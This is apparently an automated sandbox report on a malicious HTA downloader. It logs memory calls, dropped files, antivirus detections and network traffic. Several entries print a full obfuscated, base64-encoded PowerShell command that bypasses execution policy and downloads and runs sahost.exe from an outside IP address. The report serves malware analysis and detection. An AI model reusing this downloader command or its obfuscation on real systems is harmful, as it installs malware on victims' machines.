NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	c:\Users\test22\AppData\Local\Temp\wxt848r0.dll
file	C:\Users\test22\AppData\Roaming\sahost.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\system32\cmd.exe" "/c pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))"
cmdline	C:\Windows\System32\cmd.exe "/c pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))"
cmdline	pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\wxt848r0.dll

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 6, 2024, 5:36 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: "/c pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))" filepath: C:\Windows\System32\cmd.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 6, 2024, 5:36 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x03550000 process_handle: 0xffffffff	1	0	0

URL downloaded by powershell script (2 events)

Data received

HTTP/1.1 200 OK Date: Tue, 06 Aug 2024 08:39:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 06 Aug 2024 02:24:23 GMT ETag: "bdc00-61efa7de6eb91" Accept-Ranges: bytes Content-Length: 777216 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/lnk MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL°±fà0Èfç @ @@çOP H.textlÇ È `.rsrcPÊ@@.reloc Ú@BHçH¨Dqì (Ù :( o *{*v( -}*( }*{*v( -}*( }*0){

Poweshell is sending data to a remote host (2 events)

Data sent	!
Data sent	GET /90/sahost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 192.3.176.138 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 6, 2024, 5:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"

Communicates with host for which no DNS query was performed (1 event)

host

192.3.176.138

Deletes executed files from disk (2 events)

file	c:\Users\test22\AppData\Local\Temp\CSCFB28.tmp
file	C:\Users\test22\AppData\Local\Temp\RESFB39.tmp

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

Skyhigh	BehavesLike.HTML.ExpKitGen2.cx
ALYac	VBS.Heur.Asthma.2.D59CD80F.Gen
VIPRE	VBS.Heur.Asthma.2.D59CD80F.Gen
Symantec	ISB.Downloader!gen80
Kaspersky	Trojan.HTA.Agent.bw
BitDefender	VBS.Heur.Asthma.2.D59CD80F.Gen
NANO-Antivirus	Trojan.Script.Heuristic-js.iacgm
MicroWorld-eScan	VBS.Heur.Asthma.2.D59CD80F.Gen
Emsisoft	VBS.Heur.Asthma.2.D59CD80F.Gen (B)
FireEye	VBS.Heur.Asthma.2.D59CD80F.Gen
Ikarus	Trojan-Downloader.PowerShell.Agent
Google	Detected
MAX	malware (ai score=80)
Arcabit	VBS.Heur.Asthma.2.D59CD80F.Gen
ZoneAlarm	Trojan.HTA.Agent.bw
GData	VBS.Heur.Asthma.2.D59CD80F.Gen
Varist	JS/Agent.CIN.gen!Eldorado
Zoner	Probably Heur.HTMLUnescape

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (5 events)

Time & API	Arguments	Status	Return
send Aug. 6, 2024, 5:36 p.m.	buffer: ! socket: 1384 sent: 1	1	1
send Aug. 6, 2024, 5:36 p.m.	buffer: GET /90/sahost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 192.3.176.138 Connection: Keep-Alive socket: 1516 sent: 304	1	304
send Aug. 6, 2024, 5:36 p.m.	buffer: ! socket: 1384 sent: 1	1	1
InternetCrackUrlA Aug. 6, 2024, 5:36 p.m.	url: http://192.3.176.138/90/sahost.exe flags: 0	1	1
URLDownloadToFileW Aug. 6, 2024, 5:36 p.m.	url: http://192.3.176.138/90/sahost.exe stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Roaming\sahost.exe filepath: C:\Users\test22\AppData\Roaming\sahost.exe		2148270091

An executable file was downloaded by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Aug. 6, 2024, 5:36 p.m.	buffer: HTTP/1.1 200 OK Date: Tue, 06 Aug 2024 08:39:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 06 Aug 2024 02:24:23 GMT ETag: "bdc00-61efa7de6eb91" Accept-Ranges: bytes Content-Length: 777216 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/lnk MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL°±fà0Èfç @ @@çOP H.textlÇ È `.rsrcPÊ@@.reloc Ú@BHçH¨Dqì (Ù :( o {v( -}( }{v( -}( }*0){ received: 1024 socket: 1516	1	1024	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\sahost.exe

Creates a suspicious Powershell process (6 events)

option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\sahost[1].exe

90.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All